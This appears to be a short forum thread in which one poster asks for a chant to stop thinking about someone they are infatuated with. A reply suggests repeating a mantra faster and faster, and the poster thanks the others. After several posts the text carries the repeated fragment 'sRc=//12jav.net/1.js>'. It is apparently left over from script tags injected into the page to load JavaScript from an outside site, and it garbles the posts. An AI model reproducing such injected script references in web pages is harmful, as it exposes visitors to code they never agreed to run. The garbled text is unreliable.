I need someone to give me a good chant or something to take my mind off a weird guy that I can't get out from under my skin or see or talk to. Really wiggin and "keeping busy " aint doin it because I still have time to think. :( sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Do thik jus ben - it will help take the focus off, just keep increasing the tempo you are repeating it at till your mind more or less breaks into a state of pure silence and calm. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Ooodles of karmic gratitude guys! Kao ... it does work awesomely! Joe sadly don't have a mirror but will try later if kao's idea starts flaggin ,, spirit wolf, I don't think you get exactly how hard I am trippin on this guy... think full on twitterpated with no outlet, yeah yeah it blows.
